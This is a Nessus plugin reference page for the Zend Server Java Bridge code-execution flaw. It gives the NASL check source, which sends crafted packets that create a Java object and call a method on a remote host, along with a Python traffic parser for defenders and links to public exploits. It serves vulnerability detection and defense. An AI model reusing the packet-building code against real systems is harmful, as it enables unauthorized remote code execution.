Zend Server Java Bridge Arbitrary Java Code Execution - Nessus

Critical   Plugin ID: 53533

This page contains detailed information about the Zend Server Java Bridge Arbitrary Java Code Execution Nessus plugin, including available exploits and PoCs found on GitHub, in Metasploit or in Exploit-DB for verifying this vulnerability.

Plugin Overview


ID: 53533
Name: Zend Server Java Bridge Arbitrary Java Code Execution
Filename: zend_server_java_bridge_code_exec.nasl
Vulnerability Published: 2011-03-24
This Plugin Published: 2011-04-22
Last Modification Time: 2018-11-15
Plugin Version: 1.11
Plugin Type: remote
Plugin Family: Misc.
Dependencies: None

Vulnerability Information


Severity: Critical
Vulnerability Published: 2011-03-24
Patch Published: 2011-03-24
CVE: N/A
CPE: N/A

Synopsis

The remote service has a code execution vulnerability.

Description

Zend Server Java Bridge, a service that lets PHP applications use Java code, has an arbitrary code execution vulnerability. The service accepts requests to execute Java code without authentication.

A remote, unauthenticated attacker could exploit this to execute arbitrary Java code.

Solution

Apply the hotfix provided by the vendor.

If the hotfix is already applied, ensure access to the service is restricted using the 'zend.javamw.ip' system property.

Public Exploits


Target Network Port(s): 10001
Target Asset(s): N/A
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the Zend Server Java Bridge Arbitrary Java Code Execution vulnerability:

  1. Metasploit: exploit/multi/misc/zend_java_bridge
    [Zend Server Java Bridge Arbitrary Java Code Execution]
  2. Exploit-DB: exploits/multiple/remote/17078.java
    [EDB-17078: Zend Java Bridge - Remote Code Execution]
  3. Exploit-DB: exploits/multiple/remote/17148.rb
    [EDB-17148: Zend Server Java Bridge - Arbitrary Java Code Execution (Metasploit)]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS V2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:ND
CVSS Base Score: 10.0 (High)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
CVSS Temporal Score: 8.3 (High)
CVSS Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall CVSS Score: 8.3 (High)


Plugin Source


This is the zend_server_java_bridge_code_exec.nasl Nessus plugin source code. This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.

#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  script_id(53533);
  script_version("1.11");
  script_cvs_date("Date: 2018/11/15 20:50:24");

  script_bugtraq_id(47060);
  script_xref(name:"EDB-ID", value:"17078");
  script_xref(name:"EDB-ID", value:"17148");

  script_name(english:"Zend Server Java Bridge Arbitrary Java Code Execution");
  script_summary(english:"Tries to execute Java");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote service has a code execution vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Zend Server Java Bridge, a service that lets PHP applications use
Java code, has an arbitrary code execution vulnerability.  The service
accepts requests to execute Java code without authentication. 

A remote, unauthenticated attacker could exploit this to execute
arbitrary Java code."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.zerodayinitiative.com/advisories/ZDI-11-113/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://seclists.org/bugtraq/2011/Mar/277"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?0c9a77c7"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"Apply the hotfix provided by the vendor.

If the hotfix is already applied, ensure access to the service is
restricted using the 'zend.javamw.ip' system property."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Zend Server Java Bridge Arbitrary Java Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"vuln_publication_date", value:"2011/03/24");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/03/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2011/04/22");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.");

  script_require_ports(10001);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("byte_func.inc");


global_var port;

##
# makes a CreateObject request packet
#
# @anonparam  class  class name of the instance to be created
#
# @return a CreateObject packet
##
function create_object_req()
{
  local_var class, action, req;
  class = _FCT_ANON_ARGS[0];
  action = 'CreateObject';

  req =
    '\x00\x00\x00\x00' + # ?
    mkdword(strlen(action)) + action +
    '\x00\x00\x00\x02' + # ?
    '\x04' + # ?
    mkdword(strlen(class)) + class +
    '\x07' + # ?
    '\x00\x00\x00\x00';
  req = make_request(req);

  return req;
}

##
# makes a request packet for invoking a method
#
# @param  obj_id  object ID of the instance containing the method to be invoked
# @param  method  the method to invoke
# @param  arg     the argument to pass to 'method' (assumes there is one arg and it's a string)
#
# @return a method invocation request packet
##
function invoke_method_req(obj_id, method, arg)
{
  local_var req;

  req =
    obj_id +
    mkdword(strlen(method)) + method +
    '\x00\x00\x00\x01' + # ?
    '\x04' + # ?
    mkdword(strlen(arg)) + arg;
  req = make_request(req);

  return req;
}

##
# Creates a Java Bridge request packet (adds a 4 byte size header)
#
# @anonparam  payload  payload of the request packet to create
#
# @return the generated request packet
##
function make_request()
{
  local_var payload, req;
  payload = _FCT_ANON_ARGS[0];
  req = mkdword(strlen(payload)) + payload;

  return req;
}

##
# Processes a Java Bridge response packet (strips the header and returns the payload)
#
# This function will exit() if it encounters any errors
#
# @anonparam  sock  socket where the response data can be read from
#
# @return the data received from the server, minus the header
##
function process_response()
{
  local_var sock, len, data;
  sock = _FCT_ANON_ARGS[0];

  len = recv(socket:sock, length:4);
  if (strlen(len) != 4)
    exit(1, 'Error reading packet length from port ' + port + '.');

  len = getdword(blob:len, pos:0);
   
  #
  # Do not process responses bigger than 10Mb
  #
  if ( len >= 10*1024*1024 ) 
    exit(1, 'Packet length advertised on port ' + port + ' is too big.');

  data = recv(socket:sock, length:len);
  if (strlen(data) != len)
    exit(1, 'Unexpected amount of data received from port ' + port + '.');

  return data;
}


# plugin starts here

# The patch makes the service listen on localhost rather than
# all interfaces, so we'll skip localhost to avoid FPs
if (islocalhost()) exit(1, 'Can\'t test against localhost.');

port = 10001;
if (known_service(port:port)) exit(0, 'The service on port '+port+' was already identified.');
if (!get_tcp_port_state(port)) exit(0, "Port "+port+" is not open.");

soc = open_sock_tcp(port);
if (!soc)
  exit(1, "Failed to open a socket on port "+port+".");

# first create the object
# $system = new Java("java.lang.System")
class = 'java.lang.System';
new_req = create_object_req(class);
send(socket:soc, data:new_req);
res = process_response(soc);
if (strlen(res) != 5 || res[0] != '\x05')
  exit(0, 'Unexpected response to first request from port '+port+' (probably not Java Bridge).');

object_id = substr(res, 1, 4);

# Then invoke a method, proving we can execute arbitrary Java
# $system->getProperty("java.version")
method = 'getProperty';
arg = 'java.version';
req = invoke_method_req(obj_id:object_id, method:method, arg:arg);
send(socket:soc, data:req);
res = process_response(soc);

# Clean up (deallocate/GC/whatever our object and send a 'reset')
req = '\xff\xff\xff\xff' + mkdword(strlen('delObject')) + 'delObject' + '\x00\x00\x00\x01\x02' + object_id;
req = make_request(req);
send(socket:soc, data:req);
del_res = recv(socket:soc, length:5);

# should return a pkt header + null byte. if we get something
# unexpected, close the socket without sending the reset
if (isnull(del_res) || strlen(del_res) != 5 || del_res[4] != '\x00')
{
  close(soc);
}
else
{
  req = '\xff\xff\xff\xff' + mkdword(strlen('reset')) + 'reset' + '\x00\x00\x00\x00';
  req = make_request(req);
  send(socket:soc, data:req);
  rst_res = recv(socket:soc, length:5);
  # the server should return a pkt header + null byte,
  # but we don't care what it does at this point
  close(soc);
}

# Check the response from the method invocation
if (res[0] != '\x04')
  exit(1, 'Unexpected response to getProperty() on port '+port+'.');

ver_len = getdword(blob:res, pos:1);
ver = substr(res, 5, 4 + ver_len);

if (ver_len != strlen(ver))
  exit(1, 'Unexpected packet size in getProperty() response on port '+port+'.');

# If we made it this far, we successfully executed the method,
# which also means we've detected the service
register_service(port:port, proto:"java_bridge");

if (report_verbosity > 0)
{
  report =
    '\nNessus was able to get the JRE version number by executing Java' +
    '\non the remote host :\n' +
    '\n  Method call  : ' + class +'.'+ method+'("'+arg+'")' +
    '\n  Return value : ' + ver + '\n';
  security_hole(port:port, extra:report);
}
else security_hole(port);
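Added example (not part of the plugin or this page): a defender-side parser, in Python, for the Java Bridge framing the plugin uses. It splits a captured TCP stream to port 10001 into length-prefixed frames, classifies each frame as a CreateObject, a method invocation or a housekeeping command, and raises an alert for every object instantiation, since after the hotfix the service listens on localhost only and such requests should never arrive from a remote peer. The sample capture is constructed from the plugin's own requests with a made-up object id of 7; the 4-byte length fields are treated as big-endian, which is an assumption about mkdword()'s default byte order.

```python
import struct
MAX_FRAME = 10 * 1024 * 1024  # same size cap the plugin applies to responses

def _lstr(s):
    return struct.pack(">I", len(s)) + s  # mkdword(strlen(s)) + s, as the plugin builds it

def frame(payload):
    return struct.pack(">I", len(payload)) + payload  # the plugin's make_request()

# Constructed sample traffic: the CreateObject, method-invoke and delObject
# requests the plugin sends, using a made-up object id of 7 for the instance.
SAMPLE_CAPTURE = (
    frame(b"\x00\x00\x00\x00" + _lstr(b"CreateObject") + b"\x00\x00\x00\x02\x04"
          + _lstr(b"java.lang.System") + b"\x07\x00\x00\x00\x00")
    + frame(b"\x00\x00\x00\x07" + _lstr(b"getProperty") + b"\x00\x00\x00\x01\x04"
            + _lstr(b"java.version"))
    + frame(b"\xff\xff\xff\xff" + _lstr(b"delObject") + b"\x00\x00\x00\x01\x02\x00\x00\x00\x07")
)

def split_frames(data):
    """Yield frame payloads; stop at a truncated frame or one over MAX_FRAME."""
    pos = 0
    while pos + 4 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        if length > MAX_FRAME or pos + 4 + length > len(data):
            break
        yield data[pos + 4:pos + 4 + length]
        pos += 4 + length

def parse_frame(payload):
    """Classify one frame by its leading object id and dword-prefixed name."""
    if len(payload) < 8:
        return {"kind": "malformed"}
    obj_id, name_len = struct.unpack(">II", payload[:8])
    if 8 + name_len > len(payload):
        return {"kind": "malformed"}
    name = payload[8:8 + name_len].decode("ascii", "replace")
    if obj_id == 0xFFFFFFFF:                 # delObject / reset housekeeping
        return {"kind": "control", "name": name}
    if obj_id == 0 and name == "CreateObject":
        off = 8 + name_len + 5               # skip the arg-count dword and type tag
        if off + 4 > len(payload):
            return {"kind": "malformed"}
        (cls_len,) = struct.unpack(">I", payload[off:off + 4])
        cls = payload[off + 4:off + 4 + cls_len].decode("ascii", "replace")
        return {"kind": "create", "class": cls}
    return {"kind": "invoke", "obj_id": obj_id, "method": name}

def alerts(data):
    """One alert per object instantiation seen in a stream to port 10001."""
    return ["CreateObject " + e["class"]
            for e in map(parse_frame, split_frames(data)) if e["kind"] == "create"]
```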

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/zend_server_java_bridge_code_exec.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\zend_server_java_bridge_code_exec.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/zend_server_java_bridge_code_exec.nasl


How to Run


Here is how to run the Zend Server Java Bridge Arbitrary Java Code Execution plugin standalone via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select Misc. plugin family.
  6. On the right side table select Zend Server Java Bridge Arbitrary Java Code Execution plugin ID 53533.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl zend_server_java_bridge_code_exec.nasl -t <IP/HOST>

Run the plugin with an audit trail message on the console:

/opt/nessus/bin/nasl -a zend_server_java_bridge_code_exec.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - zend_server_java_bridge_code_exec.nasl -t <IP/HOST>

Run the plugin using a state file for the target and updating it (useful for running multiple plugins against the same target):

/opt/nessus/bin/nasl -K /tmp/state zend_server_java_bridge_code_exec.nasl -t <IP/HOST>


References


BID | SecurityFocus Bugtraq ID: 47060

See also:
  • https://www.zerodayinitiative.com/advisories/ZDI-11-113/
  • https://seclists.org/bugtraq/2011/Mar/277
  • http://www.nessus.org/u?0c9a77c7

Similar and related Nessus plugins:
  • 22299 - e107 ibrowser.php zend_has_del() Function Remote Code Execution
  • 62571 - FreeBSD : Zend Framework -- Multiple vulnerabilities via XXE injection (ec34d0c2-1799-11e2-b4ab-000c29033c32)
  • 108931 - GLSA-201804-10 : Zend Framework: Multiple vulnerabilities
  • 83350 - Magento XML-RPC XXE Arbitrary File Disclosure
  • 156103 - Apache Log4j 1.2 JMSAppender Remote Code Execution (CVE-2021-4104)
  • 155999 - Apache Log4j < 2.15.0 Remote Code Execution (Nix)
  • 156002 - Apache Log4j < 2.15.0 Remote Code Execution (Windows)
  • 103223 - Apple TV <= 7.2.2 Bluetooth Remote Code Execution (BlueBorne)
  • 159113 - CRI-O package 1.19.x < 1.19.6 / 1.20.x < 1.20.7 / 1.21.x < 1.21.6 / 1.22.x < 1.22.3 / 1.23.x < 1.23.2 Arbitrary Code Execution (CVE-2022-0811)
  • 119681 - Quest NetVault Backup Server < 11.4.5 Process Manager Service SQL Injection Remote Code Execution Vulnerability (ZDI-17-982)
  • 104052 - Oracle Enterprise Manager Ops Center Remote Code Execution (October 2017 CPU)
  • 65049 - Oracle Java JDK / JRE 5 < Update 41 Remote Code Execution (Unix)
  • 65051 - Oracle Java JDK / JRE 6 < Update 43 Remote Code Execution (Unix)
  • 65053 - Oracle Java JDK / JRE 7 < Update 17 Remote Code Execution (Unix)
  • 103931 - Oracle JDeveloper ADF Faces Unspecified Remote Code Execution (October 2017 CPU)
  • 78700 - Oracle Adaptive Access Manager Server Arbitrary Code Execution (October 2014 CPU)
  • 133041 - Oracle Tuxedo Remote Code Execution Vulnerability (Jan 2020 CPU)
  • 124337 - Oracle WebLogic Server wls9_async_response / wls-wsat Remote Code Execution
  • 126051 - Oracle WebLogic Server Web Services Remote Code Execution Vulnerability
  • 122056 - Samba < 2.2.8a Remote Code Execution Vulnerability
  • 129500 - Spring Framework 4.3.x < 4.3.16 / 5.0.x < 5.0.5 Remote Code Execution with spring-messaging (CVE-2018-1270)
  • 159374 - Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965)
  • 117401 - Apache Struts 2.x < 2.3.14.2 Remote Code Execution Vulnerability (S2-013)
  • 128765 - Apache Struts 2.x < 2.3.14.3 Remote Code Execution Vulnerability (S2-012)
  • 112036 - Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)
  • 151425 - Apache Struts 2.0.0 < 2.5.26 Possible Remote Code Execution vulnerability (S2-061)
  • 159667 - Apache Struts 2.0.0 < 2.5.30 Possible Remote Code Execution vulnerability (S2-062)
  • 142226 - Apache Synapse < 3.0.1 Remote Code Execution Vulnerability
  • 72580 - Ubiquiti airCam < 1.2.0 ubnt-streamer RTSP Service Remote Code Execution
  • 78508 - VMware vCenter Server Appliance Bash Remote Code Execution (VMSA-2014-0010) (Shellshock)
  • 128280 - Webmin < 1.930 Remote Code Execution Vulnerability

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file zend_server_java_bridge_code_exec.nasl version 1.11. For more plugins, visit the Nessus Plugin Library.
